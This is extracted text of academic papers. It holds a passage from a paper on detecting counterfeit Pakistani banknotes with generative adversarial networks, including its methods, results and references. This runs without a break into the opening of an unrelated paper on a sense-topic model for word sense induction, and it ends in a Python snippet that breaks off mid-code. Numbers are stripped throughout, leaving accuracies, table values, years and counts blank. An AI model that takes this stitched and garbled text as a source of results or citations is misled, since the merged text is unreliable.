pooling can be achieved in many ways, such as by taking an average or by learning patterns and combinations, for example learning linear associations or combinations of the neurons in that small block. autoencoder: there are many machine learning models, but auto-encoders are fairly basic ones. they come from a family of neural networks for which the input is the same as the output. auto-encoders compress the input into a latent-space representation and then reconstruct the output from that representation. auto-encoders are artificial neural networks used for unsupervised learning, and they can be trained efficiently. today, auto-encoders are an emerging field of research in numerous areas, such as anomaly detection. (figure: deep belief networks.) deep belief networks: deep belief networks (lee et al., ) consist of layers of variables, both latent as well as stochastic. latent variables are usually composed of values that are binary and known as feature detectors. there are many layers in this network. the top layers consist of undirected connections, which allows them to form a kind of associative memory. on the other hand, the lower layers have directed links from any previous or top layer. a lower layer represents a data vector. an example of a deep belief network is depicted in fig. . long short-term memory: the fully connected recurrent neural network works but, when applied to different models, it suffers from two problems: firstly, vanishing gradients and, secondly, exploding gradients. lstm (long short-term memory) was invented to solve these issues by introducing a memory unit, called a cell, into the network. the cell is used as storage or memory that remembers a value for long or possibly short time periods (hochreiter & schmidhuber, ; sak, senior & beaufays, ; warrington & baddeley, ). an lstm is represented in fig. . (figure: long short-term memory.) problem statement: the existing solutions only work to detect the security features of the notes, and at present this is the only viable approach used to tackle this issue. forged notes are not detectable by the naked eye, and this results in financial loss to the general public. degraded bank notes are also in circulation, which may result in usage problems. the solution given in this paper is based on generative adversarial networks (gans) (goodfellow et al., ) that use generative and discriminative models for the recognition of real and counterfeit currency notes. to the best of our knowledge, this is the first research being done to detect forged money using gans. we trained the discriminative model with pakistani rupee notes, while the generative model g was used to produce counterfeit notes for the discriminative model d to classify. the objectives of the study are twofold: (1) to build a dataset of real and counterfeit pakistani currency, which is not available at present in the public domain; and (2) to present, design, and implement deepmoney, a method to differentiate counterfeit notes from genuine bank notes. proposed solution: in this section, the proposed solution is elaborated and details are provided as to how generative adversarial networks cope with real and fake data. generative adversarial networks: a very new and effective generative model, known as generative adversarial networks (gans), is utilized for generating counterfeit samples and for recognizing original data items from the generated ones (goodfellow et al., ; goodfellow et al., ; radford, metz & chintala, ; salimans et al., ). gans can differentiate with maximum accuracy between the fake and real banknotes. gans are an interesting class of neural networks that work with two modules: one is called the generative network and the second is known as the discriminator network. quite promising results have been achieved after employing gans on the dataset, which were subsequently used to classify the real and fake notes. the proposed model is depicted in fig. , wherein the discriminator neural network (d) is trained by providing data from the training set (original distribution) and generated data (after perturbation, i.e., adding noise from the latent space). the loss functions of the discriminator network and the generator network (g) are updated during training. after training is completed, the model is able to classify real and fake currency notes with an accuracy of percent. in gans, the discriminator part works as a classifier for recognizing the images; however, in the learning process, both the generator and the discriminator coordinate with each other. (figure: deepmoney, proposed counterfeit model.) a generated image is sent to the discriminator module to classify whether it is a fake or a real image. if it is recognizable, the discriminator will produce its output; if it is not, the module will send it back to the generator to regenerate the image. based on the feedback received, the generator improves its output and creates the image. the process continues until both models are optimal in correctly generating and classifying the same image. in the case of currency note identification, the basic idea is that there are two models as defined by gans. the generative model generates fake banknotes, and the discriminative model d estimates the probability that the data it receives came from the training data rather than from the generator g. to learn the generator's distribution $p_g$ over data $a$, a prior $p_b(b)$ is defined on input noise variables $b$, which are then mapped to the banknote data space as $G(b; \theta_g)$, where $G$ is a differentiable function represented by a multilayer perceptron with parameters $\theta_g$. following the gan framework, a second multilayer perceptron $D(y; \theta_d)$ is designed that outputs a single scalar; $D(a)$ represents the probability that banknote $a$ came from the data rather than from the generator. the discriminator $D$ is trained with real banknotes to increase the probability of correctly recognizing the data $a$, while the sample $b$ is the noise input from which the generative model $G$ produces fakes. the loss (or energy) function of the generative model $G$ can be represented mathematically as:

$$\frac{1}{m}\sum_{i=1}^{m}\Bigl[\log\bigl(1 - D(G(b_i))\bigr)\Bigr]$$

and the loss function of the discriminator can be represented as:

$$\frac{1}{m}\sum_{i=1}^{m}\Bigl[\log D(a_i) + \log\bigl(1 - D(G(b_i))\bigr)\Bigr]$$

figure shows a complete flow of how our deepmoney process works.
real images are given as input to the discriminator, while for training, communication is performed between the discriminator and the generator. (figure: deepmoney currency bill verification components.) different components have been built to perform the verification of the currency note. figure shows the basic structure of the deepmoney architecture, its actors, and the way they interact with each other. there is a single actor here, which is shown as the user. the user can input an image and request the authentication of the currency note. the system will respond through various other functions, as shown in fig. . external systems may be used to receive assistance from the sensors if necessary. as deepmoney progresses, other more appropriate features may be found, the use of these initial features may be minimized, and other more versatile features may evolve. in this case, the 'input image' will remain the same but the dependent functionalities may change. data preparation and augmentation: data collection and its preprocessing are carried out before training neural networks or deep learning models for subsequent recognition tasks. the following subsections provide the necessary details of how data is prepared and augmented from image datasets through the following function: datagen = ImageDataGenerator(). taking pictures and building a dataset is a laborious and time-consuming task. an api specially designed for creating augmented image data is used, which takes less time to augment the data and reduces memory overhead. ImageDataGenerator augments the data, and once the generator has been created and configured, the data is fitted by calling the fit() function, datagen.fit(train), which is passed the training dataset. (figure: input image.) the data generator is an iterator, and it returns batches of images when they are requested: x_batch, y_batch = datagen.flow(train, train, batch_size= ). finally, fit_generator() is called with two arguments: the desired number of epochs for which to train, and the data generator itself, as in fit_generator(datagen, samples_per_epoch=len(train), epochs= ). there are many ways to configure the data preparation and its augmentation. these include feature-wise standardization, zca whitening, random rotations, shifts, shear and flips, dimension reordering, and saving augmented images to disk. all of these augmentations are performed by calling the ImageDataGenerator function. as a result of providing the input image as depicted in fig. , the function ImageDataGenerator produces augmented data incorporating the aforementioned features, as shown in fig. . experimental setup: the experiments are carried out on a gpu machine at fast university with the following configuration. keras is configured with theano as the backend. from the keras library, the Dense, Dropout, Activation, and Flatten layers are imported. the Dense layer is used to define filters with model parameters to identify various features of the currency notes. the Dropout layer is used to address overfitting by ignoring some of the features which do not contribute to identifying the actual features of the notes. the activation function "relu" is used in order to represent the learned information in ranges of and . the number of epochs and the batch size are set to and , respectively. to use the ImageDataGenerator function, keras was utilized besides configuring scipy, numpy, h5py, and pyyaml. furthermore, a number of parameters were set for achieving augmentation, which included: samplewise center, featurewise std normalization, zca epsilon, zca whitening, rotation range, width shift range, height shift range, shear range, zoom range, channel shift, horizontal and vertical flips, and rescale. these are set to either , , or float values for the required changes. after specifying the parameters and storing them in a datagen variable, the images were imported. (figure: output images.)
as specified by the iterations, images of the bank note with the changes specified in the datagen will be produced and stored in the folder called preview. implementation: comprehensive details are provided as to how the environment was set up for executing this project of gans on the dataset. the first step involved the setup and configuration of the requirements needed to execute the code. after running certain required scripts, the gan was trained on the deepmoney dataset. both the discriminator and the generator used a learning rate of . . the generator was updated twice for each update of the discriminator; this keeps the discriminator loss from becoming too small. in the next step, results are produced and saved in png format. the class diagram in fig. represents the major classes of deepmoney. as can be seen, the main controller class is inputimage, and every other class is developed from that class. inputimage reads an image and passes that image to one of those classes, or to multiple classes, according to the requirement. the respective classes will then call their functions, which may call another function of a different class. the sequence diagram in fig. shows the functions and their activities after they have been executed. as discussed earlier, functions may or may not call functions of different classes if the required task is beyond their scope. the functions of other classes are called through instances of their respective classes. the called function then returns the result to the parent function which, in turn, processes the user request. (figures: class diagram for the deepmoney architecture; deepmoney sequence diagram.) the algorithm for the gans is provided in fig. , the algorithm for generating images is provided in fig. , and the algorithm for augmentation is provided in fig. . (figures: algorithms for generating currency notes.) results: this section elaborates the results obtained through the experiments conducted on the deepmoney dataset, as depicted in table . moreover, a model evaluation is presented with the confusion matrix, the supervised loss function, the respective generator and discriminator losses, and finally the classification accuracy.

table: experimental results.
no. of folds | accuracy | sensitivity | specificity | precision | kappa | f score | roc/auc
(the three rows of numeric values in this table are not recoverable from the extracted text.)

area under the curve (auc): the trained model was able to achieve % accuracy in correctly classifying data. the area under the curve (auc)/receiver operating characteristic (roc) is presented in fig. . (figure: deepmoney area under curve.) confusion matrix: the confusion matrix consists of three classes along the x and y axes. each row of the matrix represents one class along the y-axis and shows its comparison with all the remaining classes. the classes belong to the deepmoney dataset, having images of rs. , rs. , and rs. . each class is assigned a unique density color. high-intensity shades represent no confusion between classes, while the lower-intensity band represents confusion rates between the classes. in fig. , the diagonal entries indicate that the confusion matrix calculation is near perfect. (figure: confusion matrix calculation.) supervised loss: cross-entropy was minimized for the multi-class softmax, and for that purpose the labels were adjusted. a label mask was used in the code to ignore the images that are unlabeled for the semi-supervised learning problem. the tensorflow graph visualizations (percentage vs. number of epochs) are shown in figs. - . total discriminator loss (td loss): using the objective function of gans, the total discriminator loss (td loss) is brought down to . . this helped make the discriminator more efficient in classification. the tensorflow graph visualization is plotted against (percentage loss vs. number of epochs) in fig. . (figure: discriminator loss graph visualization.) generator loss (g loss): using the objective function of gans, the generator's loss (g loss) was brought up to ( . ), which can be seen in fig. . this helped make the generator more robust in training the discriminator. the tensorflow graph visualization is plotted against (percentage loss vs. number of epochs). (figure: generator loss graph visualization.) classification accuracy: the discriminator is trained to classify unseen images, and its efficiency is measured in terms of correct classification. as can be seen in fig. , a remarkable classification accuracy ( %) was achieved, which was made possible by training the discriminator on the deepmoney dataset and generator images. the tensorflow graph visualization is depicted in fig. (percentage accuracy vs. number of epochs). (figure: classification accuracy graph visualization.) conclusion: the implementation of gan models in the domain of computer vision has proven to be effective. when tested on currency originality, the discriminator model is a viable contender as a classifier. additionally, the classifier should be trained with sufficiently many images, from both the real dataset and the generator module, especially in semi-supervised generative adversarial networks (ssgans). the dataset can also be varied through other parametric tweaking within the keras framework. % accuracy is achieved by the proposed gan framework for counterfeit money detection; however, there is still room for improvement. as new generative models are created in the machine learning domain, deepmoney can be tested on them to achieve better and more effective results. multi-class classifiers can be made good enough to result in improved accuracy. classification is regarded to be at the forefront of machine learning; therefore, a better multi-class classifier would yield an even better score for the model. additional information and declarations. funding: the authors received no funding for this work. competing interests: the authors declare there are no competing interests. author contributions: • toqeer ali conceived and designed the experiments, contributed reagents/materials/analysis tools, and approved the final draft. • salman jan conceived and designed the experiments, performed the experiments, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. • ahmad alkhodre contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, and provided proof-reading and other support. • mohammad nauman performed the experiments. • muhammad amin analyzed the data and performed the computation work. • muhammad shoaib siddiqui provided the dataset and code. data availability: the following information was supplied regarding data availability:
counterfeit detection using characterization of safety feature on banknote with full-field optical co- herence tomography. journal of the optical society of korea ( ): – doi . /josk. . . . . derrida j. . given time: i. counterfeit money, volume . chicago: university of chicago press. goodfellow i, bengio y, courville a, bengio y. . deep learning, volume . cam- bridge: mit press. goodfellow i, pouget-abadie j, mirza m, xu b, warde-farley d, ozair s, courville a, bengio y. . generative adversarial nets. in: international conference on advances in neural information processing systems. cambridge: mit press, – . hassanpour h, farahabadi pm. . using hidden markov models for paper currency recognition. expert systems with applications ( ): – doi . /j.eswa. . . . hochreiter s, schmidhuber j. . long short-term memory. neural computation ( ): – doi . /neco. . . . . kang k, lee c. . fake banknote detection using multispectral images. in: informa- tion, intelligence, systems & applications (iisa), th international conference on. piscataway: ieee, – . kayani s. . a bank note processing system having a combined florescence and phosphorescence detection system. us patent , , . available at https://patents. justia.com/patent/ (accessed on february ). ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /m .figshare. .v https://doi.org/ . /m .figshare. .v https://www.tdcommons.org/cgi/viewcontent.cgi?article= &context=dpubs_series https://www.tdcommons.org/cgi/viewcontent.cgi?article= &context=dpubs_series http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /ijret. . http://dx.doi.org/ . /josk. . . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /neco. . . . https://patents.justia.com/patent/ https://patents.justia.com/patent/ http://dx.doi.org/ . /peerj-cs. krizhevsky a, sutskever i, hinton ge. . imagenet classification with deep con- volutional neural networks. in: advances in neural information processing systems. – . lee h, pham p, largman y, ng ay. . unsupervised feature learning for audio classification using convolutional deep belief networks. in: advances in neural information processing systems. – . magdaleno a. . woman pleads guilty for printing thousands of money as fake. mashable. available at http://on.mash.to/ luzvzv (accessed on january ). micali s, devadas s. . counterfeit prevention. us patent application / , (accessed on february ). mirza r, nanda v. a. design and implementation of indian paper currency authen- tication system based on feature extraction by edge based segmentation using sobel operator. international journal of engineering research and development ( ): – . mirza r, nanda v. b. paper currency verification system based on characteristic extraction using image processing. international journal of engineering and advanced technology (ijeat) ( ): – . mohamad ns, hussin b, shibghatullah as, basari a. . banknote authentication using artificial neural network. science international ( ): – . murakami-fester a. . counterfiet cases in us. usa today. available at https: //www.usatoday.com/story/money/personalfinance/ / / /counterfeit-money- spot-fake/ / (accessed on january ). phillips r. . miniaturized counterfeit detector. us patent application / , . available at http://www.freepatentsonline.com/y / .html (accessed on february ). prasanthi bs, setty dr. . indian paper currency authentication system using image processing. international journal of research in engineering and technology : – . radford a, metz l, chintala s. . 
unsupervised representation learning with deep convolutional generative adversarial networks. arxiv preprint. arxiv: . . ross dj, elmenhurst bj, tocci m, forbes j, ross hw. . database for detecting counterfeit items using digital fingerprint records. us patent application / , . available at https://patents.google.com/patent/us a /en (accessed on february ). sak h, senior a, beaufays f. . long short-term memory recurrent neural network architectures for large scale acoustic modeling. in: fifteenth annual conference of the international speech communication association. salimans t, goodfellow i, zaremba w, cheung v, radford a, chen x. . improved techniques for training gans. in: advances in neural information processing systems. – . shoaib m, ilyas m, khiyal m, hayat s. . official digital currency. in: digital infor- mation management (icdim), eighth international conference on. piscataway: ieee, – . ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://on.mash.to/ luzvzv https://www.usatoday.com/story/money/personalfinance/ / / /counterfeit-money-spot-fake/ / https://www.usatoday.com/story/money/personalfinance/ / / /counterfeit-money-spot-fake/ / https://www.usatoday.com/story/money/personalfinance/ / / /counterfeit-money-spot-fake/ / http://www.freepatentsonline.com/y / .html http://arxiv.org/abs/ . https://patents.google.com/patent/us a /en http://dx.doi.org/ . /peerj-cs. singh m, ozarde p, abhiram k. . image processing based detection of counterfeit indian bank notes. in: th international conference on computing, communication and networking technologies. – . snehlata , saxena v. . identification of fake currency: a case study of indian sce- nario. international journal of advanced research in computer science ( ): – . taillard m. . counterfeiting. in: economics and modern warfare. new york: palgrave macmillan, – . tanaka t, nishiyama s, koyama m. . method for making an anti-counterfeit latent image formation object for bills, credit cards, etc. us patent a issued december , . available at https://patents.google.com/patent/us a/en. thakur m, kaur a. . various fake currency detection techniques. international journal for technological research in engineering ( ): – . warrington e, baddeley a. . amnesia and the distinction between long-and short- term memory . in: exploring working memory. new york: routledge, – . ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://patents.google.com/patent/us a/en http://dx.doi.org/ . /peerj-cs. a sense-topic model for word sense induction with unsupervised data enrichment jing wang∗ mohit bansal† kevin gimpel† brian d. ziebart∗ clement t. yu∗ ∗university of illinois at chicago, chicago, il, , usa {jwang ,bziebart,cyu}@uic.edu †toyota technological institute at chicago, chicago, il, , usa {mbansal,kgimpel}@ttic.edu abstract word sense induction (wsi) seeks to automat- ically discover the senses of a word in a cor- pus via unsupervised methods. we propose a sense-topic model for wsi, which treats sense and topic as two separate latent vari- ables to be inferred jointly. topics are in- formed by the entire document, while senses are informed by the local context surrounding the ambiguous word. we also discuss unsu- pervised ways of enriching the original cor- pus in order to improve model performance, including using neural word embeddings and external corpora to expand the context of each data instance. 
we demonstrate significant im- provements over the previous state-of-the-art, achieving the best results reported to date on the semeval- wsi task. introduction word sense induction (wsi) is the task of automat- ically discovering all senses of an ambiguous word in a corpus. the inputs to wsi are instances of the ambiguous word with its surrounding context. the output is a grouping of these instances into clusters corresponding to the induced senses. wsi is gen- erally conducted as an unsupervised learning task, relying on the assumption that the surrounding con- text of a word indicates its meaning. most previous work assumed that each instance is best labeled with a single sense, and therefore, that each instance be- longs to exactly one sense cluster. however, recent work (erk and mccarthy, ; jurgens, ) has shown that more than one sense can be used to inter- pret certain instances, due to context ambiguity and sense relatedness. to handle these characteristics of wsi (unsuper- vised, senses represented by token clusters, multiple senses per instance), we consider approaches based on topic models. a topic model is an unsupervised method that discovers the semantic topics underly- ing a collection of documents. the most popular is latent dirichlet allocation (lda; blei et al., ), in which each topic is represented as a multinomial distribution over words, and each document is rep- resented as a multinomial distribution over topics. one approach would be to run lda on the in- stances for an ambiguous word, then simply inter- pret topics as induced senses (brody and lapata, ). however, while sense and topic are related, they are distinct linguistic phenomena. topics are assigned to entire documents and are expressed by all word tokens, while senses relate to a single am- biguous word and are expressed through the local context of that word. one possible approach would be to only keep the local context of each ambigu- ous word, discarding the global context. however, the topical information contained in the broader con- text, though it may not determine the sense directly, might still be useful for narrowing down the likely senses of the ambiguous word. consider the ambiguous word cold. in the sen- tence “his reaction to the experiments was cold”, the possible senses for cold include cold tempera- ture, a cold sensation, common cold, or a negative emotional reaction. however, if we know that the topic of the document concerns the effects of low temperatures on physical health, then the negative emotional reaction sense should become less likely. therefore, in this case, knowing the topic helps nar- row down the set of plausible senses. transactions of the association for computational linguistics, vol. , pp. – , . action editor: hwee tou ng. submission batch: / ; revision batch / ; revision batch / ; published / . c© association for computational linguistics. at the same time, knowing the sense can also help determine possible topics. consider a set of texts that all include the word cold. without further in- formation, the texts might discuss any of a number of possible topics. however, if the sense of cold is that of cold ischemia, then the most probable topics would be those related to organ transplantation. in this paper, we propose a sense-topic model for wsi, which treats sense and topic as two separate latent variables to be inferred jointly (§ ). 
when re- lating the sense and topic variables, a bidirectional edge is drawn between them to represent their cyclic dependence (heckerman et al., ). we perform inference using collapsed gibbs sampling (§ . ), then estimate the sense distribution for each instance as the solution to the wsi task. we conduct exper- iments on the semeval- task wsi dataset, showing improvements over several strong baselines and task systems (§ ). we also present unsupervised ways of enriching our dataset, including using neural word embed- dings (mikolov et al., ) and external web-scale corpora to enrich the context of each data instance or to add more instances (§ ). each data enrich- ment method gives further gains, resulting in sig- nificant improvements over existing state-of-the-art wsi systems. overall, we find gains of up to % relative improvement in fuzzy b-cubed and % rel- ative improvement in fuzzy normalized mutual in- formation (jurgens and klapaftis, ). background and related work we discuss the wsi task, then discuss several areas of research that are related to our approach, includ- ing applications of topic modeling to wsi as well as other approaches that use word embeddings and clustering algorithms. wsd and wsi: wsi is related to but distinct from word sense disambiguation (wsd). wsd seeks to assign a particular sense label to each target word instance, where the sense labels are known and usually drawn from an existing sense inventory like wordnet (miller et al., ). al- though extensive research has been devoted to wsd, wsi may be more useful for downstream tasks. wsd relies on sense inventories whose construc- tion is time-intensive, expensive, and subject to poor inter-annotator agreement (passonneau et al., ). sense inventories also impose a fixed sense gran- ularity for each ambiguous word, which may not match the ideal granularity for the task of interest. finally, they may lack domain-specific senses and are difficult to adapt to low-resource domains or lan- guages. in contrast, senses induced by wsi are more likely to represent the task and domain of interest. researchers in machine translation and information retrieval have found that predefined senses are of- ten not well-suited for these tasks (voorhees, ; carpuat and wu, ), while induced senses can lead to improved performance (véronis, ; vick- rey et al., ; carpuat and wu, ). topic modeling for wsi: brody and lapata ( ) proposed a topic model that uses a weighted combination of separate lda models based on dif- ferent feature sets (e.g. word tokens, parts of speech, and dependency relations). they only used smaller units of text surrounding the ambiguous word, dis- carding the global context of each instance. yao and van durme ( ) proposed a model based on a hi- erarchical dirichlet process (hdp; teh et al., ), which has the advantage that it can automatically discover the number of senses. lau et al. ( ) de- scribed a model based on an hdp with positional word features; it formed the basis for their submis- sion (unimelb, lau et al., ) to the semeval- wsi task (jurgens and klapaftis, ). our sense-topic model is distinct from this prior work in that we model sense and topic as two sepa- rate latent variables and learn them jointly. we com- pare to the performance of unimelb in § . for word sense disambiguation, there also exist several approaches that use topic models (cai et al., ; boyd-graber and blei, ; boyd-graber et al., ; li et al., ); space does not permit a full discussion. 
word representations for wsi: another ap- proach to solving wsi is to use word representations built by distributional semantic models (dsms; sahlgren, ) or neural net language models (nnlms; bengio et al., ; mnih and hinton, ). their assumption is that words with similar distributions have similar meanings. akkaya et al. ( ) use word representations learned from dsms directly for wsi. each word is represented by a co- occurrence vector, and the meaning of an ambigu- ous word in a specific context is computed through element-wise multiplication applied to the vector of the target word and its surrounding words in the con- text. then instances are clustered by hierarchical clustering based on their representations. word representations trained by nnlms, often called word embeddings, capture information via training criteria based on predicting nearby words. they have been useful as features in many nlp tasks (turian et al., ; collobert et al., ; dhillon et al., ; hisamoto et al., ; bansal et al., ). the similarity between two words can be computed using cosine similarity of their embed- ding vectors. word embeddings are often also used to build representations for larger units of text, such as sentences, through vector operations (e.g., sum- mation) applied to the vector of each token in the sentence. in our work, we use word embeddings to compute word similarities (for better modeling of our data distribution), to represent sentences (to find similar sentences in external corpora for data enrich- ment), and in a product-of-embeddings baseline. baskaya et al. ( ) represent the context of each ambiguous word by using the most likely substitutes according to a -gram lm. they pair the ambigu- ous word with likely substitutes, project the pairs onto a sphere (maron et al., ), and obtain final senses via k-means clustering. we compare to their semeval- system ai-ku (§ ). other approaches to wsi: other approaches in- clude clustering algorithms to partition instances of an ambiguous word into sense-based clus- ters (schütze, ; pantel and lin, ; purandare and pedersen, ), or graph-based methods to in- duce senses (dorow and widdows, ; véronis, ; agirre and soroa, ). problem setting in this paper, we induce senses for a set of word types, which we refer to as target words. for each target word, we have a set of instances. each in- stance provides context for a single occurrence of the target word. for our experiments, we use the the target word token may occur multiple times in an in- stance, but only one occurrence is chosen as the target word occurrence. figure : proposed sense-topic model in plate notation. there are md instances for the given target word. in an instance, there are ng global context words (wg) and n` local context words (w`), all of which are observed. there is one latent variable (“topic” tg) for the wg and two latent variables (“topic” t` and “sense” s`) for the w`. each instance has topic mixing proportions θt and sense mixing proportions θs. for clarity, not all variables are shown. the complete figure with all variables is given in appendix a. this is a dependency network, not a di- rected graphical model, as shown by the directed arrows between t` and s`; see text for details. dataset released for semeval- task (jur- gens and klapaftis, ), collected from the open american national corpus (oanc; ide and suder- man, ). it includes target words: verbs, nouns, and adjectives. there are a total of , instances across all target words. 
Each instance contains only one sentence, with a minimum length of and a maximum length of . The gold standard for the dataset was prepared by multiple annotators, where each annotator labeled instances based on the sense inventories in WordNet . . For each instance, they rated all senses of a target word on a Likert scale from one to five. (The task, "Word Sense Induction for Graded and Non-Graded Senses," is described at http://www.cs.york.ac.uk/semeval-/task.)

A Sense-Topic Model for WSI

We now present our sense-topic model, shown in plate notation in Figure . It generates the words in the set of instances for a single target word; we run the model separately for each target word, sharing no parameters across target words. We treat sense and topic as two separate latent variables to be inferred jointly. To differentiate sense and topic, we use a window around the target word in each instance. Word tokens inside the window are local context words (w_ℓ), while tokens outside the window are global context words (w_g). The number of words in the window is fixed to in all experiments ( words before the target word and after).

Generating global context words: As shown in the left part of Figure , each global context word w_g is generated from a latent topic variable t_g for the instance, which follows the same generative story as LDA. The corresponding probability of the i-th global context word w_g^{(i)} within instance d is:

$$\Pr(w_g^{(i)} \mid d, \theta_t, \psi_t) = \sum_{j=1}^{T} p_{\psi_{t_j}}\!\left(w_g^{(i)} \mid t_g^{(i)} = j\right) \, p_{\theta_t}\!\left(t_g^{(i)} = j \mid d\right) \qquad (1)$$

where T is the number of topics, p_{ψ_{t_j}}(w_g^{(i)} | t_g^{(i)} = j) is the multinomial distribution over words for topic j (parameterized by ψ_{t_j}), and p_{θ_t}(t_g^{(i)} = j | d) is the multinomial distribution over topics for instance d (parameterized by θ_t).

Generating local context words: A local context word w_ℓ is generated from a topic variable t_ℓ and a sense variable s_ℓ:

$$\Pr(w_\ell \mid d, \theta_t, \psi_t, \theta_s, \psi_s, \theta_{s|t}, \theta_{t|s}, \theta_{st}) = \sum_{j=1}^{T} \sum_{k=1}^{S} \Pr(w_\ell \mid t_\ell = j, s_\ell = k) \, \Pr(t_\ell = j, s_\ell = k \mid d) \qquad (2)$$

where S is the number of senses, Pr(w_ℓ | t_ℓ = j, s_ℓ = k) is the probability of generating word w_ℓ given topic j and sense k, and Pr(t_ℓ = j, s_ℓ = k | d) is the joint probability over topics and senses for d.

Unlike in Eq. (1), we do not use multinomial parameterizations for the distributions in Eq. (2). When parameterizing them, we make several departures from purely-generative modeling. All our choices result in distributions over smaller event spaces and/or distributions that condition on fewer variables. This helps to mitigate data sparsity issues arising from attempting to estimate high-dimensional distributions from small datasets. A secondary benefit is that we can avoid biases caused by particular choices of generative directionality in the model. We later include an empirical comparison to justify some of our modeling choices (see the bidirectionality analysis in the experiments). (We use Pr() for generic probability distributions without further qualifiers and p_θ() for distributions parameterized by θ. For clarity, we drop the (i) superscripts in these and the following equations.)

First, when relating the sense and topic variables, we avoid making a single decision about generative dependence. Taking inspiration from dependency networks (Heckerman et al., ), we use the following factorization:

$$\Pr(t_\ell = j, s_\ell = k \mid d) = \frac{1}{Z_d} \, \Pr(s_\ell = k \mid d, t_\ell = j) \, \Pr(t_\ell = j \mid d, s_\ell = k) \qquad (3)$$

where Z_d is a normalization constant.
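To make Eq. (3) concrete, the following toy sketch (illustrative Python with made-up conditional tables, not the paper's implementation) forms the unnormalized product of the two conditionals for one instance and renormalizes over all topic/sense pairs to recover Z_d:

```python
import numpy as np

T, S = 3, 2  # toy numbers of topics and senses (illustrative only)

rng = np.random.default_rng(0)
# Hypothetical conditionals for one instance d:
# p_s_given_dt[j, k] plays the role of Pr(s=k | d, t=j); rows sum to 1 over senses.
p_s_given_dt = rng.dirichlet(np.ones(S), size=T)
# p_t_given_ds[j, k] plays the role of Pr(t=j | d, s=k); columns sum to 1 over topics.
p_t_given_ds = rng.dirichlet(np.ones(T), size=S).T

# Eq. (3): the joint over (topic, sense) is the renormalized product of the two conditionals.
unnormalized = p_s_given_dt * p_t_given_ds   # element-wise product, shape (T, S)
Z_d = unnormalized.sum()                     # normalization constant Z_d
joint = unnormalized / Z_d                   # Pr(t=j, s=k | d)

assert np.isclose(joint.sum(), 1.0)
```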
We factorize further by using redundant probabilistic events, then ignore the normalization constants during learning, a concept commonly called deficiency (Brown et al., ). Deficient modeling has been found to be useful for a wide range of NLP tasks (Klein and Manning, ; May and Knight, ; Toutanova and Johnson, ). In particular, we factor the conditional probabilities in Eq. (3) into products of multinomial probabilities:

$$\Pr(s_\ell = k \mid d, t_\ell = j) = \frac{p_{\theta_s}(s_\ell = k \mid d) \; p_{\theta_{s|t_j}}(s_\ell = k \mid t_\ell = j) \; p_{\theta_{st}}(t_\ell = j, s_\ell = k)}{Z_{d,t_j}}$$

$$\Pr(t_\ell = j \mid d, s_\ell = k) = \frac{p_{\theta_t}(t_\ell = j \mid d) \; p_{\theta_{t|s_k}}(t_\ell = j \mid s_\ell = k)}{Z_{d,s_k}}$$

where Z_{d,t_j} and Z_{d,s_k} are normalization factors and we have introduced new multinomial parameters θ_s, θ_{s|t_j}, θ_{st}, and θ_{t|s_k}. We use the same idea to factor the word generation distribution:

$$\Pr(w_\ell \mid t_\ell = j, s_\ell = k) = \frac{p_{\psi_{t_j}}(w_\ell \mid t_\ell = j) \; p_{\psi_{s_k}}(w_\ell \mid s_\ell = k)}{Z_{t_j,s_k}}$$

where Z_{t_j,s_k} is a normalization factor, and we have new multinomial parameters ψ_{s_k} for the sense-word distributions. One advantage of this parameterization is that we naturally tie the topic-word distributions across the global and local context words by using the same parameters ψ_{t_j}.

Generative Story

We now give the full generative story of our model. We describe it for generating a set of instances of size M_d, where all instances contain the same target word. We use symmetric Dirichlet priors for all multinomial distributions mentioned above, using the same fixed hyperparameter value (α) for all. We use ψ to denote parameters of multinomial distributions over words, and θ to denote parameters of multinomial distributions over topics and/or senses. We leave unspecified the distributions over N_ℓ (number of local words in an instance) and N_g (number of global words in an instance), as we only use our model to perform inference given fixed instances, not to generate new instances.

The generative story first follows the steps described in Algorithm 1 to generate parameters that are shared across all instances; then, for each instance d, it follows Algorithm 2 to generate global and local words.

Algorithm 1: Generative story for the instance set
1: for each topic j ← 1 to T do
2:     choose topic-word params. ψ_{t_j} ∼ Dir(α)
3:     choose topic-sense params. θ_{s|t_j} ∼ Dir(α)
4: for each sense k ← 1 to S do
5:     choose sense-word params. ψ_{s_k} ∼ Dir(α)
6:     choose sense-topic params. θ_{t|s_k} ∼ Dir(α)
7: choose topic/sense params. θ_{st} ∼ Dir(α)

Algorithm 2: Generative story for instance d
1: choose topic proportions θ_t ∼ Dir(α)
2: choose sense proportions θ_s ∼ Dir(α)
3: choose N_g and N_ℓ from unspecified distributions
4: for i ← 1 to N_g do
5:     choose a topic j ∼ Mult(θ_t)
6:     choose a word w_g ∼ Mult(ψ_{t_j})
7: for i ← 1 to N_ℓ do
8:     repeat
9:         choose a topic j ∼ Mult(θ_t)
10:        choose a sense k ∼ Mult(θ_s)
11:        choose a topic j′ ∼ Mult(θ_{t|s_k})
12:        choose a sense k′ ∼ Mult(θ_{s|t_j})
13:        choose topic/sense ⟨j″, k″⟩ ∼ Mult(θ_{st})
14:    until j = j′ = j″ and k = k′ = k″
15:    repeat
16:        choose a word w_ℓ ∼ Mult(ψ_{t_j})
17:        choose a word w′_ℓ ∼ Mult(ψ_{s_k})
18:    until w_ℓ = w′_ℓ

Inference

We use collapsed Gibbs sampling (Geman and Geman, ) to obtain samples from the posterior distribution over latent variables, with all multinomial parameters analytically integrated out before sampling. Then we estimate the sense distribution θ_s for each instance using maximum likelihood estimation on the samples. These sense distributions are the output of our WSI system.

We note that deficient modeling does not ordinarily affect Gibbs sampling when used for computing posteriors over latent variables, as long as the parameters (the θ and ψ) are kept fixed.
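As a concrete reading of the deficient word-generation distribution above, here is a small sketch (toy arrays only; parameters held fixed, as in the E-step setting just described) that computes Pr(w_ℓ | t_ℓ = j, s_ℓ = k) both with its normalization constant Z_{t_j,s_k} and with the constant dropped, which is what the deficiency approximation does:

```python
import numpy as np

W = 5          # toy vocabulary size (illustrative)
j, k = 1, 0    # one particular topic and sense

rng = np.random.default_rng(1)
psi_t = rng.dirichlet(np.ones(W), size=3)   # topic-word multinomials, one row per topic
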